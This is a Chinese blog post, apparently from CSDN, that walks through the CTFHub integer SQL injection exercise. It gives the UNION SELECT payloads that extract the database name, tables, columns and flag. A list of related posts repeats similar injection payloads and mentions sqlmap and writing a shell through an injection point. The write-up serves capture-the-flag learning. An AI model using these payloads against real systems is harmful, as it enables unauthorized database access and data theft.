CTFHub 技能树-sql (整型注入)

最新推荐文章于 2023-07-25 21:56:59 发布
最新推荐文章于 2023-07-25 21:56:59 发布
阅读量236 收藏
点赞数
分类专栏: CTFHub SQL 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54803507/article/details/127030857
版权
渗透测试 同时被 3 个专栏收录
6 篇文章 5 订阅
订阅专栏
CTFHub
1 篇文章 0 订阅
订阅专栏
SQL
1 篇文章 0 订阅
订阅专栏

进去判断是否有注入点

我们输入1和2都会出现回显存 但是输入3后显示无回显

 判断是存在注入点

加引号号

这里输入3'的sql语句是,显示无法查询到东西无回显,判断存在注入点

这里我是用手工测试注入也可以使用sqlmap测试

这里我使用传统的方法直接开注

从上面我们得知有两个回显位置,下面开始:暴库名

' ' union select 1,database() #

 爆出库名'sqli',接下来开始爆表名

' ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 爆出表明有 flag,news两个,这边我们要flag就直接去flag表,开始判断字段名

' ' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #

 判断出存在flag字段,接下来就简单了直接一个SQL语句就可以了

' ' union select 1,flag from flag #

这样就拿到我们的flag了

渗透小剑客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub 技能树SQL注入
滚滚是只小狐狸
03-05 1056
标题CTFHub 技能树SQL注入 进入CTFHub官网 一:SQL整数型注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
CTFHub-技能树-Web-SQL注入-整数型注入
m0_62504956的博客
02-19 423
1.查询database数据库 2.查询库中的表 3.查询表中的字段 5.确定flag
CTFHUB-SQL整形注入
Web学习之路
03-06 170
SQL整形注入原理,一步步教会你SQL注入
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 1991
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2473
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
360天擎-前台sql注入1
08-03
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
CTFHUB技能树SQL注入整数型和字符型注入
zw1358978796的博客
03-02 446
这里写目录标题一整数型注入二字符型注入 一整数型注入 1在url地址栏中id属性後面添加 id =1 and 1=1 查看是否报错,添加后发现能正常访问,就将代码改为 id =1 and 1=2 添加代码后发现会出现报错,此时说明有sql注入点 直接进入第二步,查询字段使用: id=1 and 1=1 order by 1 id=1 and 1=1 order by 2 id=1 and 1=1 order by 3 将数值改到3时,发现报错,此时发现表中只有两个字段 进入第三步,使用sql语句
ctfhubsql整数型注入
hyhyxyx的博客
07-25 268
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
CTFHub(整数型注入
sGanYu
07-24 2200
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
CTFHUB-整数型SQL注入
xixihahawuwu的博客
12-24 4297
CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入 使用order by语句查询字段数 参数为3时不回显,说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3268
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
CTFHub SQL 整数型注入[四步]
luminous_you的博客
12-04 434
判断列数 1 order by 2 判断回显点 1 union select 1,2 判断表名列名 -1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database() 得出结果【两种方法】 -1 union select 1,flag from sqli.flag limit 0,1 -1 union select 1,(se
[CTFhub技能树]SQL注入———整数注入
KKleeeaa的博客
04-06 164
u后面接的URL --batch -dbs就是爆库 -o类似与一键优化运行速度。sqlmap直接运行不了的的 前面加个python 然后是sqlmap.py。然后我就可以开始爆表 -D 后面接指定库名 --tables就是爆库的表。然后我们使用order by 语句查询有多少列。然后我们可以通过 联合查询 查库名 表名 列名。我们可以看到有注入点 他自动动注入。解法2——用SQLmap工具解开。根据题目指示我们输入一个1。发现这个列里面有字段。
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2196
数据库注入
CTF整理】CTFhub技能树-Web-SQL注入
SunnyCat
05-10 2083
CTF整理】CTFhub技能树-Web-SQL注入 目录【CTF整理】CTFhub技能树-Web-SQL注入SQL整数型注入SQL字符型注入SQL报错注入SQL布尔型注入SQL时间注入MySQL结构Cookie注入UA注入Referer注入 SQL整数型注入 确定闭合方式 :1 确定报错位有2个,(我选2注入点) 得到库名 得到表名 得到列名 得到flag SQL字符型注入 确定闭合方式:1’ 【步骤和整形一样,不再使用,我这里采用sqlmap】 核心语法: sqlmap -u "url+参
ctfhub技能树web基础认证
最新发布
03-13
下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET、POST等),了解HTTP请求和响应的结构。 2. URL编码和解码:学习URL编码和解码的原理和常见的编码方式,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值